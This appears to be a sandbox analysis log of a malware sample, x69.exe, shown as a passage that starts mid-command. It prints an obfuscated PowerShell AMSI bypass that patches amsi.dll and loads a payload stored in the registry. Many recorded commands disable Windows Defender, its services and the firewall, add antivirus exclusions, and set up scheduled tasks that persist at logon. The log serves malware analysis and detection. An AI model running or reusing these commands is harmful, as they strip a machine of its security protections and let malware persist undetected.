Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+'M'+'y'+'D'+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+'n'+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$KLyzITCmmIs.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+'a'+[Char](108)+'N'+'a'+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+'y'+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$KLyzITCmmIs.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)
+''+[Char](99)+''+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$aBdREcctId,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $KLyzITCmmIs.CreateType();}$GAEdqfBeOtXRU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'rosoft'+'.'+''+'W'+''+[Char](105)+'n3'+'2'+''+[Char](46)+'U'+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$jFokKXmvUCMqXx=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BeVuaQsZPkIBjfUtdcw=wndeDcOuxJyW @([String])([IntPtr]);$hSBXIQwXtoyHXUDcycnAeO=wndeDcOuxJyW 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MOqpBmKFIuF=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+'3'+[Char](50)+''+'.'+'d'+'l'+'l')));$lOXpkLenleHsgM=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$BNkFFxcqxhXuJFhoN=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$cLbnIeA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lOXpkLenleHsgM,$BeVuaQsZPkIBjfUtdcw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$wCVQpXLlZspVveqCi=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$cLbnIeA,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$xDvWZkIXPW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,4,[ref]$xDvWZkIXPW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wCVQpXLlZspVveqCi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,0x20,[ref]$xDvWZkIXPW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''
+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:6132
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:2132
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2912
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2044
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2944
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3404
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3528 -
C:\Users\Admin\AppData\Local\Temp\x69.exe"C:\Users\Admin\AppData\Local\Temp\x69.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3416
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:928
-
-
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\771043f8.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:3108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4484
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C15C.tmp\C15D.tmp\C15E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4676 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:3708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4896 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:5096
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2868 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3708
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:5156
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5180
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:5196
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:5228
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5256
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5280
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5308
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5332
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5360
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:5416
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:5476
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5504
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5532
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:5556
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:5576
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:5620
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:5644
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:5676
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:5708
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:5732
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5764
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5796
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5812
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5856
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5876
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5908
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5948
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:5972
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2936
-
-
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\045b1cb4.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:6040 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3240
-
-
-
-
-
-
  2⤵ C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
    - Suspicious use of WriteProcessMemory
    PID: 1004
    3⤵ C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 3620
    3⤵ C:\Users\Admin\AppData\Roaming\x69.exe
      C:\Users\Admin\AppData\Roaming\x69.exe
      - Checks computer location settings
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 464
      4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4336
      4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3572
      4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3512
        5⤵ C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID: 3884
      4⤵ C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
        - Scheduled Task/Job: Scheduled Task
        PID: 5052
  2⤵ C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
    - Suspicious use of WriteProcessMemory
    PID: 780
    3⤵ C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
      C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
      - Checks computer location settings
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2988
      4⤵ C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
